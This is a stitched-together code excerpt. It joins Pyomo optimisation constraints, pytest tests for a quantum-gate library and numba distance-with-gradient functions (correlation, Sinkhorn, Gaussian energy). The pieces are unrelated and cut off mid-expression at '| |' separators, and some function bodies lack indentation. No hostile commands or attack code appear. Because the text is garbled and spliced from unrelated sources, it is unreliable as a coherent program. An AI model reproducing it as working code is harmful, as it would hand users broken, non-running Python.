+ m.x1613 == 0)
m.c614 = Constraint(expr= - m.x204 - 82.091893062253*m.x854 - 4.62594653112602*m.x859 - 0.173783959337771*m.x864
+ m.x1614 == 0)
m.c615 = Constraint(expr= - m.x205 - 82.091893062253*m.x855 - 4.62594653112602*m.x860 - 0.173783959337771*m.x865
+ m.x1615 == 0)
m.c616 = Constraint(expr= - m.x206 - 364.2*m.x866 - 91.05*m.x871 - 15.175*m.x876 + m.x1616 == 0)
m.c617 = Constraint(expr= - m.x207 - 364.2*m.x867 - 91.05*m.x872 - 15.175*m.x877 + m.x1617 == 0)
m.c618 = Constraint(expr= - m.x208 - 364.2*m.x868 - 91.05*m.x873 - 15.175*m.x878 + m.x1618 == 0)
m.c619 = Constraint(expr= - m.x209 - 364.2*m.x869 - 91.05*m.x874 - 15.175*m.x879 + m.x1619 == 0)
m.c620 = Constraint(expr= - m.x210 - 364.2*m.x870 - 91.05*m.x875 - 15.175*m.x880 + m.x1620 == 0)
m.c621 = Constraint(expr= - m.x206 - 646.308106937747*m.x866 - 286.734053468873*m.x871 - 84.8062160406618*m.x876
+ m.x1621 == 0)
m.c622 = Constraint(expr= - m.x207 - 646.308106937747*m.x867 - 286.734053468873*m.x872 - 84.8062160406618*m.x877
+ m.x1622 == 0)
m.c623 = Constraint(expr= - m.x208 - 646.308106937747*m.x868 - 286.734053468873*m.x873 - 84.8062160406618*m.x878
+ m.x1623 == 0)
m.c624 = Constraint(expr= - m.x209 - 646.308106937747*m.x869 - 286.734053468873*m.x874 - 84.8062160406618*m.x879
+ m.x1624 == 0)
m.c625 = Constraint(expr= - m.x210 - 646.308106937747*m.x870 - 286.734053468873*m.x875 - 84.8062160406618*m.x880
+ m.x1625 == 0)
m.c626 = Constraint(expr= - m.x206 - 82.091893062253*m.x866 - 4.62594653112602*m.x871 - 0.173783959337771*m.x876
+ m.x1626 == 0)
m.c627 = Constraint(expr= - m.x207 - 82.091893062253*m.x867 - 4.62594653112602*m.x872 - 0.173783959337771*m.x877
+ m.x1627 == 0)
m.c628 = Constraint(expr= - m.x208 - 82.091893062253*m.x868 - 4.62594653112602*m.x873 - 0.173783959337771*m.x878
+ m.x1628 == 0)
m.c629 = Constraint(expr= - m.x209 - 82.091893062253*m.x869 - 4.62594653112602*m.x874 - 0.173783959337771*m.x879
+ m.x1629 == 0)
m.c630 = Constraint(expr= - m.x210 - 82.091893062253*m.x870 - 4.62594653112602*m.x875 - 0.173783959337771*m.x880
+ m.x1630 == 0)
m.c631 = Constraint(expr= - m.x211 - 364.2*m.x881 - 91.05*m.x886 - 15.175*m.x891 + m.x1631 == 0)
m.c632 = Constraint(expr= - m.x212 - 364.2*m.x882 - 91.05*m.x887 - 15.175*m.x892 + m.x1632 == 0)
m.c633 = Constraint(expr= - m.x213 - 364.2*m.x883 - 91.05*m.x888 - 15.175*m.x893 + m.x1633 == 0)
m.c634 = Constraint(expr= - m.x214 - 364.2*m.x884 - 91.05*m.x889 - 15.175*m.x894 + m.x1634 == 0)
m.c635 = Constraint(expr= - m.x215 - 364.2*m.x885 - 91.05*m.x890 - 15.175*m.x895 + m.x1635 == 0)
m.c636 = Constraint(expr= - m.x211 - 646.308106937747*m.x881 - 286.734053468873*m.x886 - 84.8062160406618*m.x891
+ m.x1636 == 0)
m.c637 = Constraint(expr= - m.x212 - 646.308106937747*m.x882 - 286.734053468873*m.x887 - 84.8062160406618*m.x892
+ m.x1637 == 0)
m.c638 = Constraint(expr= - m.x213 - 646.308106937747*m.x883 - 286.734053468873*m.x888 - 84.8062160406618*m.x893
+ m.x1638 == 0)
m.c639 = Constraint(expr= - m.x214 - 646.308106937747*m.x884 - 286.734053468873*m.x889 - 84.8062160406618*m.x894
+ m.x1639 == 0)
m.c640 = Constraint(expr= - m.x215 - 646.308106937747*m.x885 - 286.734053468873*m.x890 - 84.8062160406618*m.x895
+ m.x1640 == 0)
m.c641 = Constraint(expr= - m.x211 - 82.091893062253*m.x881 - 4.62594653112602*m.x886 - 0.173783959337771*m.x891
+ m.x1641 == 0)
m.c642 = Constraint(expr= - m.x212 - 82.091893062253*m.x882 - 4.62594653112602*m.x887 - 0.173783959337771*m.x892
+ m.x1642 == 0)
m.c643 = Constraint(expr= - m.x213 - 82.091893062253*m.x883 - 4.62594653112602*m.x888 - 0.173783959337771*m.x893
+ m.x1643 == 0)
m.c644 = Constraint(expr= - m.x214 - 82.091893062253*m.x884 - 4.62594653112602*m.x889 - 0.173783959337771*m.x894
+ m.x1644 == 0)
m.c645 = Constraint(expr= - m.x215 - 82.091893062253*m.x885 - 4.62594653112602*m.x890 - 0.173783959337771*m.x895
+ m.x1645 == 0)
m.c646 = Constraint(expr= - m.x216 - 364.2*m.x896 - 91.05*m.x901 - 15.175*m.x906 + m.x1646 == 0)
m.c647 = Constraint(expr= - m.x217 - 364.2*m.x897 - 91.05*m.x902 - 15.175*m.x907 + m.x1647 == 0)
m.c648 = Constraint(expr= - m.x218 - 364.2*m.x898 - 91.05*m.x903 - 15.175*m.x908 + m.x1648 == 0)
m.c649 = Constraint(expr= - m.x219 - 364.2*m.x899 - 91.05*m.x904 - 15.175*m.x909 + m.x1649 == 0)
m.c650 = Constraint(expr= - m.x220 - 364.2*m.x900 - 91.05*m.x905 - 15.175*m.x910 + m.x1650 == 0)
m.c651 = Constraint(expr= - m.x216 - 646.308106937747*m.x896 - 286.734053468873*m.x901 - 84.8062160406618*m.x906
+ m.x1651 == 0)
m.c652 = Constraint(expr= - m.x217 - 646.308106937747*m.x897 - 286.734053468873*m.x902 - 84.8062160406618*m.x907
+ m.x1652 == 0)
m.c653 = Constraint(expr= - m.x218 - 646.308106937747*m.x898 - 286.734053468873*m.x903 - 84.8062160406618*m.x908
+ m.x1653 == 0)
m.c654 = Constraint(expr= - m.x219 - 646.308106937747*m.x899 - 286.734053468873*m.x904 - 84.8062160406618*m.x909
+ m.x1654 == 0)
m.c655 = Constraint(expr= - m.x220 - 646.308106937747*m.x900 - 286.734053468873*m.x905 - 84.8062160406618*m.x910
+ m.x1655 == 0)
m.c656 = Constraint(expr= - m.x216 - 82.091893062253*m.x896 - 4.62594653112602*m.x901 - 0.173783959337771*m.x906
+ m.x1656 == 0)
m.c657 = Constraint(expr= - m.x217 - 82.091893062253*m.x897 - 4.62594653112602*m.x902 - 0.173783959337771*m.x907
+ m.x1657 == 0)
m.c658 = Constraint(expr= - m.x218 - 82.091893062253*m.x898 - 4.62594653112602*m.x903 - 0.173783959337771*m.x908
+ m.x1658 == 0)
m.c659 = Constraint(expr= - m.x219 - 82.091893062253*m.x899 - 4.62594653112602*m.x904 - 0.173783959337771*m.x909
+ m.x1659 == 0)
m.c660 = Constraint(expr= - m.x220 - 82.091893062253*m.x900 - 4.62594653112602*m.x905 - 0.173783959337771*m.x910
+ m.x1660 == 0)
m.c661 = Constraint(expr= - m.x221 - 364.2*m.x911 - 91.05*m.x916 - 15.175*m.x921 + m.x1661 == 0)
m.c662 = Constraint(expr= - m.x222 - 364.2*m.x912 - 91.05*m.x917 - 15.175*m.x922 + m.x1662 == 0)
m.c663 = Constraint(expr= - m.x223 - 364.2*m.x913 - 91.05*m.x918 - 15.175*m.x923 + m.x1663 == 0)
m.c664 = Constraint(expr= - m.x224 - 364.2*m.x914 - 91.05*m.x919 - 15.175*m.x924 + m.x1664 == 0)
m.c665 = Constraint(expr= - m.x225 - 364.2*m.x915 - 91.05*m.x920 - 15.175*m.x925 + m.x1665 == 0)
m.c666 = Constraint(expr= - m.x221 - 646.308106937747*m.x911 - 286.734053468873*m.x916 - 84.8062160406618*m.x921
+ m.x1666 == 0)
m.c667 = Constraint(expr= - m.x222 - 646.308106937747*m.x912 - 286.734053468873*m.x917 - 84.8062160406618*m.x922
+ m.x1667 == 0)
m.c668 = Constraint(expr= - m.x223 - 646.308106937747*m.x913 - 286.734053468873*m.x918 - 84.8062160406618*m.x923
+ m.x1668 == 0)
m.c669 = Constraint(expr= - m.x224 - 646.308106937747*m.x914 - 286.734053468873*m.x919 - 84.8062160406618*m.x924
+ m.x1669 == 0)
m.c670 = Constraint(expr= - m.x225 - 646.308106937747*m.x915 - 286.734053468873*m.x920 - 84.8062160406618*m.x925
+ m.x1670 == 0)
m.c671 = Constraint(expr= - m.x221 - 82.091893062253*m.x911 - 4.62594653112602*m.x916 - 0.173783959337771*m.x921
+ m.x1671 == 0)
m.c672 = Constraint(expr= - m.x222 - 82.091893062253*m.x912 - 4.62594653112602*m.x917 - 0.173783959337771*m.x922
+ m.x1672 == 0)
m.c673 = Constraint(expr= - m.x223 - 82.091893062253*m.x913 - 4.62594653112602*m.x918 - 0.173783959337771*m.x923
+ m.x1673 == 0)
m.c674 = Constraint(expr= - m.x224 - 82.091893062253*m.x914 - 4.62594653112602*m.x919 - 0.173783959337771*m.x924
+ m.x1674 == 0)
m.c675 = Constraint(expr= - m.x225 - 82.091893062253*m.x915 - 4.62594653112602*m.x920 - 0.173783959337771*m.x925
+ m.x1675 == 0)
m.c676 = Constraint(expr= - m.x226 - 364.2*m.x926 - 91.05*m.x931 - 15.175*m.x936 + m.x1676 == 0)
m.c677 = Constraint(expr= - m.x227 - 364.2*m.x927 - 91.05*m.x932 - 15.175*m.x937 + m.x1677 == 0)
m.c678 = Constraint(expr= - m.x228 - 364.2*m.x928 - 91.05*m.x933 - 15.175*m.x938 + m.x1678 == 0)
m.c679 = Constraint(expr= - m.x229 - 364.2*m.x929 - 91.05*m.x934 - 15.175*m.x939 + m.x1679 == 0)
m.c680 = Constraint(expr= - m.x230 - 364.2*m.x930 - 91.05*m.x935 - 15.175*m.x940 + m.x1680 == 0)
m.c681 = Constraint(expr= - m.x226 - 646.308106937747*m.x926 - 286.734053468873*m.x931 - 84.8062160406618*m.x936
+ m.x1681 == 0)
m.c682 = Constraint(expr= - m.x227 - 646.308106937747*m.x927 - 286.734053468873*m.x932 - 84.8062160406618*m.x937
+ m.x1682 == 0)
m.c683 = Constraint(expr= - m.x228 - 646.308106937747*m.x928 - 286.734053468873*m.x933 - 84.8062160406618*m.x938
+ m.x1683 == 0)
m.c684 = Constraint(expr= - m.x229 - 646.308106937747*m.x929 - 286.734053468873*m.x934 - 84.8062160406618*m.x939
+ m.x1684 == 0)
m.c685 = Constraint(expr= - m.x230 - 646.308106937747*m.x930 - 286.734053468873*m.x935 - 84.8062160406618*m.x940
+ m.x1685 == 0)
m.c686 = Constraint(expr= - m.x226 - 82.091893062253*m.x926 - 4.62594653112602*m.x931 - 0.173783959337771*m.x936
+ m.x1686 == 0)
m.c687 = Constraint(expr= - m.x227 - 82.091893062253*m.x927 - 4.62594653112602*m.x932 - 0.173783959337771*m.x937
+ m.x1687 == 0)
m.c688 = Constraint(expr= - m.x228 - 82.091893062253*m.x928 - 4.62594653112602*m.x933 - 0.173783959337771*m.x938
+ m.x1688 == 0)
m.c689 = Constraint(expr= - m.x229 - 82.091893062253*m.x929 - 4.62594653112602*m.x934 - 0.173783959337771*m.x939
+ m.x1689 == 0)
m.c690 = Constraint(expr= - m.x230 - 82.091893062253*m.x930 - 4.62594653112602*m.x935 - 0.173783959337771*m.x940
+ m.x1690 == 0)
m.c691 = Constraint(expr= - m.x231 - 364.2*m.x941 - 91.05*m.x946 - 15.175*m.x951 + m.x1691 == 0)
m.c692 = Constraint(expr= - m.x232 - 364.2*m.x942 - 91.05*m.x947 - 15.175*m.x952 + m.x1692 == 0)
m.c693 = Constraint(expr= - m.x233 - 364.2*m.x943 - 91.05*m.x948 - 15.175*m.x953 + m.x1693 == 0)
m.c694 = Constraint(expr= - m.x234 - 364.2*m.x944 - 91.05*m.x949 - 15.175*m.x954 + m.x1694 == 0)
m.c695 = Constraint(expr= - m.x235 - 364.2*m.x945 - 91.05*m.x950 - 15.175*m.x955 + m.x1695 == 0)
m.c696 = Constraint(expr= - m.x231 - 646.308106937747*m.x941 - 286.734053468873*m.x946 - 84.8062160406618*m.x951
+ m.x1696 == 0)
m.c697 = Constraint(expr= - m.x232 - 646.308106937747*m.x942 - 286.734053468873*m.x947 - 84.8062160406618*m.x952
+ m.x1697 == 0)
m.c698 = Constraint(expr= - m.x233 - 646.308106937747*m.x943 - 286.734053468873*m.x948 - 84.8062160406618*m.x953
+ m.x1698 == 0)
m.c699 = Constraint(expr= - m.x234 - 646.308106937747*m.x944 - 286.734053468873*m.x949 - 84.8062160406618*m.x954
+ m.x1699 == 0)
m.c700 = Constraint(expr= - m.x235 - 646.308106937747*m.x945 - 286.734053468873*m.x950 - 84.8062160406618*m.x955
+ m.x1700 == 0)
m.c701 = Constraint(expr= - m.x231 - 82.091893062253*m.x941 - 4.62594653112602*m.x946 - 0.173783959337771*m.x951
+ m.x1701 == 0)
m.c702 = Constraint(expr= - m.x232 - 82.091893062253*m.x942 - 4.62594653112602*m.x947 - | |
source = np.array(list(range(16, 16 * 16)), dtype=np.float64)
# Act
actual = convert_var_to_gate(
c_sys=c_sys_2q,
var=source,
on_para_eq_constraint=True,
is_physicality_required=False,
)
# Assert
expected = np.array(
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] + list(range(16, 16 * 16)),
dtype=np.float64,
)
expected = expected.reshape(16, 16)
npt.assert_almost_equal(actual.hs, expected, decimal=15)
assert actual.composite_system is c_sys_2q
# Case 2:
# Arrange
source = np.array(list(range(16 * 16)), dtype=np.float64)
# Act
actual = convert_var_to_gate(
c_sys_2q,
source,
on_para_eq_constraint=False,
is_physicality_required=False,
)
# Assert
expected = np.array(range(16 * 16), dtype=np.float64)
expected = expected.reshape(16, 16)
npt.assert_almost_equal(actual.hs, expected, decimal=15)
assert actual.composite_system is c_sys_2q
def test_convert_gate_to_var():
    """convert_hs_to_var: the first HS row is dropped iff on_para_eq_constraint.

    Fixes the last case, which built an ``expected`` array and then asserted
    against ``hs.flatten()`` instead, leaving ``expected`` dead; also collapses
    three identical ``hs`` literals into one (the HS matrix is never mutated).
    """
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    hs = np.array(
        [[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]], dtype=np.float64
    )
    # With the TP equality constraint the first row is fixed, so the variable
    # vector omits it; the default behaves like on_para_eq_constraint=True.
    var_without_first_row = np.array(
        [0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, -1], dtype=np.float64
    )
    actual = convert_hs_to_var(c_sys, hs)
    npt.assert_almost_equal(actual, var_without_first_row, decimal=15)
    actual = convert_hs_to_var(c_sys, hs, on_para_eq_constraint=True)
    npt.assert_almost_equal(actual, var_without_first_row, decimal=15)
    # on_para_eq_constraint=False keeps the full flattened HS matrix.
    actual = convert_hs_to_var(c_sys, hs, on_para_eq_constraint=False)
    expected = np.array(
        [1, 0, 0, 0, 0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, -1], dtype=np.float64
    )
    npt.assert_almost_equal(actual, expected, decimal=15)
def test_convert_gate_to_var_2q():
    """2-qubit HS -> var conversion for both constraint settings.

    Removes dead code: the original built a ``Gate`` that was never used and
    constructed the same ``hs`` array twice.
    """
    # Arrange
    e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
    c_sys_2q = CompositeSystem([e_sys0, e_sys1])
    hs = np.arange(16 * 16, dtype=np.float64).reshape(16, 16)
    # Act: constrained conversion drops the first (fixed) row of 16 entries.
    actual = convert_hs_to_var(c_sys_2q, hs, on_para_eq_constraint=True)
    # Assert
    expected = np.arange(16, 16 * 16, dtype=np.float64)
    npt.assert_almost_equal(actual, expected, decimal=15)
    # Act: unconstrained conversion keeps all 256 entries.
    actual = convert_hs_to_var(c_sys_2q, hs, on_para_eq_constraint=False)
    # Assert
    expected = np.arange(16 * 16, dtype=np.float64)
    npt.assert_almost_equal(actual, expected, decimal=15)
def test_calc_gradient_from_gate():
    """Gradient of a gate w.r.t. variable index 1 under each constraint mode."""
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    # With the equality constraint (and by default) index 1 maps to row 1;
    # without it, index 1 maps to the flattened position (0, 1).
    grad_constrained = np.array(
        [[0, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]], dtype=np.float64
    )
    grad_unconstrained = np.array(
        [[0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]], dtype=np.float64
    )
    cases = [
        ({}, grad_constrained),
        ({"on_para_eq_constraint": True}, grad_constrained),
        ({"on_para_eq_constraint": False}, grad_unconstrained),
    ]
    for kwargs, expected in cases:
        hs = np.array(
            [[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]],
            dtype=np.float64,
        )
        actual = calc_gradient_from_gate(c_sys, hs, 1, **kwargs)
        npt.assert_almost_equal(actual.hs, expected, decimal=15)
def test_calc_agf():
    """Average gate fidelity: exact values and argument-type validation."""
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    gate_i = get_i(c_sys)
    gate_x = get_x(c_sys)
    gate_z = get_z(c_sys)
    # A gate compared with itself has unit fidelity.
    assert np.isclose(calc_agf(gate_i, gate_i), 1, atol=Settings.get_atol())
    # Distinct single-qubit Paulis: AGF(Z, X) = 1/3.
    assert np.isclose(calc_agf(gate_z, gate_x), 1.0 / 3.0, atol=Settings.get_atol())
    bad_hs = np.array(
        [[1, 1, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float64
    )
    # A raw HS matrix is not accepted where a unitary Gate is required.
    gate = Gate(c_sys, bad_hs, is_physicality_required=False)
    with pytest.raises(ValueError):
        calc_agf(gate_z.hs, gate)
    # An EffectiveLindbladian is rejected as the first argument ...
    lind = EffectiveLindbladian(c_sys, bad_hs, is_physicality_required=False)
    with pytest.raises(ValueError):
        calc_agf(lind, gate_i)
    # ... and as the second argument.
    lind = EffectiveLindbladian(c_sys, bad_hs, is_physicality_required=False)
    with pytest.raises(ValueError):
        calc_agf(gate_i, lind)
def test_convert_hs():
    """HS matrices of I/X/Y/Z converted to the computational basis."""
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    cases = [
        (get_i(c_sys), np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])),
        (get_x(c_sys), np.array([[0, 0, 0, 1], [0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 0, 0]])),
        (get_y(c_sys), np.array([[0, 0, 0, 1], [0, 0, -1, 0], [0, -1, 0, 0], [1, 0, 0, 0]])),
        (get_z(c_sys), np.array([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])),
    ]
    for gate, expected in cases:
        converted = convert_hs(gate.hs, gate.get_basis(), matrix_basis.get_comp_basis())
        npt.assert_almost_equal(converted, expected, decimal=15)
def test_get_i():
    """Identity gate: composes trivially in dim 2; HS is eye(9) in dim 3."""
    # case: dim = 2
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    i = get_i(c_sys)
    for pauli in (get_x(c_sys), get_y(c_sys), get_z(c_sys)):
        npt.assert_almost_equal(pauli.hs @ i.hs, pauli.hs, decimal=15)
        npt.assert_almost_equal(i.hs @ pauli.hs, pauli.hs, decimal=15)
    # case: dim = 3 (Gell-Mann basis)
    e_sys = ElementalSystem(1, matrix_basis.get_gell_mann_basis())
    c_sys = CompositeSystem([e_sys])
    assert np.all(get_i(c_sys).hs == np.eye(9, dtype=np.float64))
def test_get_x():
    """X gate: involution, X.Y = Z, and rejection of multi-qubit systems."""
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    i, x, y, z = get_i(c_sys), get_x(c_sys), get_y(c_sys), get_z(c_sys)
    npt.assert_almost_equal(x.hs @ x.hs, i.hs, decimal=15)
    npt.assert_almost_equal(x.hs @ y.hs, z.hs, decimal=15)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_x(c_sys_2q)
def test_get_y():
    """Y gate: involution, Y.Z = X, and rejection of multi-qubit systems."""
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    i, x, y, z = get_i(c_sys), get_x(c_sys), get_y(c_sys), get_z(c_sys)
    npt.assert_almost_equal(y.hs @ y.hs, i.hs, decimal=15)
    npt.assert_almost_equal(y.hs @ z.hs, x.hs, decimal=15)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_y(c_sys_2q)
def test_get_z():
    """Z gate: involution, Z.X = Y, and rejection of multi-qubit systems."""
    e_sys = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
    c_sys = CompositeSystem([e_sys])
    i, x, y, z = get_i(c_sys), get_x(c_sys), get_y(c_sys), get_z(c_sys)
    npt.assert_almost_equal(z.hs @ z.hs, i.hs, decimal=15)
    npt.assert_almost_equal(z.hs @ x.hs, y.hs, decimal=15)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_z(c_sys_2q)
def test_get_root_x():
    """sqrt(X): squaring its HS matrix reproduces the X gate."""
    c_sys = CompositeSystem(
        [ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())]
    )
    x = get_x(c_sys)
    root = get_root_x(c_sys)
    npt.assert_almost_equal(root.hs @ root.hs, x.hs, decimal=15)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_root_x(c_sys_2q)
def test_get_root_y():
    """sqrt(Y): squaring its HS matrix reproduces the Y gate (looser tolerance)."""
    c_sys = CompositeSystem(
        [ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())]
    )
    y = get_y(c_sys)
    root = get_root_y(c_sys)
    # decimal=10 (not 15): the square root introduces extra rounding error.
    npt.assert_almost_equal(root.hs @ root.hs, y.hs, decimal=10)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_root_y(c_sys_2q)
def test_get_s():
    """S gate: S squared equals Z."""
    c_sys = CompositeSystem(
        [ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())]
    )
    z = get_z(c_sys)
    s = get_s(c_sys)
    npt.assert_almost_equal(s.hs @ s.hs, z.hs, decimal=15)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_s(c_sys_2q)
def test_get_sdg():
    """S-dagger gate: composing with S yields the identity."""
    c_sys = CompositeSystem(
        [ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())]
    )
    s = get_s(c_sys)
    sdg = get_sdg(c_sys)
    i = get_i(c_sys)
    npt.assert_almost_equal(s.hs @ sdg.hs, i.hs, decimal=15)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_sdg(c_sys_2q)
def test_get_t():
    """T gate: T squared equals S."""
    c_sys = CompositeSystem(
        [ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())]
    )
    s = get_s(c_sys)
    t = get_t(c_sys)
    npt.assert_almost_equal(t.hs @ t.hs, s.hs, decimal=15)
    # A composite system with more than one qubit is rejected.
    c_sys_2q = CompositeSystem(
        [
            ElementalSystem(0, matrix_basis.get_normalized_pauli_basis()),
            ElementalSystem(1, matrix_basis.get_normalized_pauli_basis()),
        ]
    )
    with pytest.raises(ValueError):
        get_t(c_sys_2q)
def test_get_cnot():
# prepare gate
e_sys0 = ElementalSystem(0, matrix_basis.get_normalized_pauli_basis())
c_sys0 = CompositeSystem([e_sys0])
e_sys1 = ElementalSystem(1, matrix_basis.get_normalized_pauli_basis())
c_sys1 = CompositeSystem([e_sys1])
c_sys01 = CompositeSystem([e_sys0, e_sys1])
# prepare states
z0_c_sys0 = get_z0_1q(c_sys0)
z1_c_sys0 = get_z1_1q(c_sys0)
z0_c_sys1 = get_z0_1q(c_sys1)
z1_c_sys1 = get_z1_1q(c_sys1)
z0_z0 = tensor_product(z0_c_sys0, z0_c_sys1)
z0_z1 = tensor_product(z0_c_sys0, z1_c_sys1)
z1_z0 = tensor_product(z1_c_sys0, z0_c_sys1)
z1_z1 = tensor_product(z1_c_sys0, z1_c_sys1)
### gete: control bit is 1st qubit
gate = | |
/= x_sum
y[i] /= y_sum
for i in range(n):
kl1 += x[i] * np.log(x[i] / y[i])
kl2 += y[i] * np.log(y[i] / x[i])
dist = (kl1 + kl2) / 2
grad = (np.log(y / x) - (x / y) + 1) / 2
return dist, grad
@numba.njit()
def correlation_grad(x, y):
    """Correlation distance ``1 - Pearson r`` between x and y, with gradient.

    Returns a (distance, gradient-w.r.t.-x) pair. Degenerate inputs (both
    vectors constant, or zero covariance) yield a zero gradient.
    """
    n = x.shape[0]
    mean_x = 0.0
    mean_y = 0.0
    var_x = 0.0
    var_y = 0.0
    cov_xy = 0.0
    for k in range(n):
        mean_x += x[k]
        mean_y += y[k]
    mean_x /= n
    mean_y /= n
    for k in range(n):
        dx = x[k] - mean_x
        dy = y[k] - mean_y
        var_x += dx ** 2
        var_y += dy ** 2
        cov_xy += dx * dy
    if var_x == 0.0 and var_y == 0.0:
        # Both vectors constant: treat as identical.
        return 0.0, np.zeros(x.shape)
    if cov_xy == 0.0:
        # Uncorrelated: maximal distance, no useful gradient direction.
        return 1.0, np.zeros(x.shape)
    dist = 1.0 - (cov_xy / np.sqrt(var_x * var_y))
    grad = ((x - mean_x) / var_x - (y - mean_y) / cov_xy) * dist
    return dist, grad
@numba.njit(fastmath=True)
def sinkhorn_distance(
    x, y, M=_mock_identity, cost=_mock_cost, maxiter=64
):  # pragma: no cover
    """Entropic-regularised optimal-transport cost between histograms.

    Runs ``maxiter`` Sinkhorn scaling iterations with kernel ``M``, then
    contracts the resulting transport plan against ``cost``.
    """
    # Normalise both inputs to probability vectors.
    p = (x / x.sum()).astype(np.float32)
    q = (y / y.sum()).astype(np.float32)
    u = np.ones(p.shape, dtype=np.float32)
    v = np.ones(q.shape, dtype=np.float32)
    for _ in range(maxiter):
        # Alternate row/column scaling; only strictly positive marginals
        # are updated to avoid division by zero.
        marginal = M @ v
        u[marginal > 0] = p[marginal > 0] / marginal[marginal > 0]
        marginal = M.T @ u
        v[marginal > 0] = q[marginal > 0] / marginal[marginal > 0]
    plan = np.diag(v) @ M @ np.diag(u)
    total = 0.0
    for i in range(plan.shape[0]):
        for j in range(plan.shape[1]):
            if plan[i, j] > 0:
                total += plan[i, j] * cost[i, j]
    return total
@numba.njit(fastmath=True)
def spherical_gaussian_energy_grad(x, y):  # pragma: no cover
    """Distance and gradient between two spherical 2D Gaussians.

    ``x``/``y`` are packed as (mu_1, mu_2, sigma); the gradient is w.r.t. x.
    """
    delta_1 = x[0] - y[0]
    delta_2 = x[1] - y[1]
    # Combined (always positive) width; sign of x[2] re-applied to its grad.
    sigma = np.abs(x[2]) + np.abs(y[2])
    dist = (delta_1 ** 2 + delta_2 ** 2) / (2 * sigma) + np.log(sigma) + np.log(
        2 * np.pi
    )
    grad = np.empty(3, np.float32)
    grad[0] = delta_1 / sigma
    grad[1] = delta_2 / sigma
    grad[2] = np.sign(x[2]) * (
        1.0 / sigma - (delta_1 ** 2 + delta_2 ** 2) / (2 * sigma ** 2)
    )
    return dist, grad
@numba.njit(fastmath=True)
def diagonal_gaussian_energy_grad(x, y):  # pragma: no cover
    """Distance and gradient between two axis-aligned (diagonal) 2D Gaussians.

    ``x`` and ``y`` are packed as (mu_1, mu_2, var_1, var_2); returns a
    (distance, gradient-w.r.t.-x) pair with a 4-entry gradient.
    """
    mu_1 = x[0] - y[0]
    mu_2 = x[1] - y[1]
    sigma_11 = np.abs(x[2]) + np.abs(y[2])
    sigma_12 = 0.0  # diagonal model: no cross-covariance term
    sigma_22 = np.abs(x[3]) + np.abs(y[3])
    det = sigma_11 * sigma_22
    sign_s1 = np.sign(x[2])
    sign_s2 = np.sign(x[3])
    if det == 0.0:
        # Degenerate covariance: fall back to squared Euclidean distance.
        # TODO: figure out the right thing to do here
        return mu_1 ** 2 + mu_2 ** 2, np.array([0.0, 0.0, 1.0, 1.0], dtype=np.float32)
    cross_term = 2 * sigma_12
    m_dist = (
        np.abs(sigma_22) * (mu_1 ** 2)
